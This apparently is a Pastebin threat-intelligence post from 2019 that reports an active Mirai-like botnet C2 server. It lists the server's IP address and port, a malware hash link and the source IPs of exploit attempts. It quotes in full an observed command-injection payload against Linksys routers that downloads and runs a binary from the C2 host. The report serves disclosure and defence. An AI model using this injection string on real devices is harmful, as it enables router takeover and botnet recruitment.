Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Active Mirai-like botnet C2 detected:
- 192.236.162.197 (Hostwinds πΊπΈ)
- C2 port:
- 4426/tcp
- Exploit attempts targeting:
- Linksys routers
- Payload:
- "ttcp_ip=-h `cd /tmp;
- rm -rf Amakano.mpsl;
- wget http://192.236.162.197/vb/Amakano.mpsl;
- chmod 777
- Amakano.mpsl;
- ./Amakano.mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commi"
- Malware binary:
- Amakano.mpsl
- https://www.virustotal.com/gui/file/7c2360a97f911aeef103e18414ad5e4f60153d28fc1735631445a0392a75c005/detection
- http://192.236.162.197/vb/ (open directory)
- Exploit attempt source IPs:
- Source IP Country FirstSeen
- 101.108.14.144 Thailand 2019-07-16T05:13:47Z
- 49.117.81.101 China 2019-07-16T03:33:34Z
- 109.116.203.139 Italy 2019-07-16T02:57:07Z
- 151.70.138.75 Italy 2019-07-16T02:05:19Z
- 2.45.252.16 Italy 2019-07-15T23:56:21Z
- 114.235.35.12 China 2019-07-15T23:43:14Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement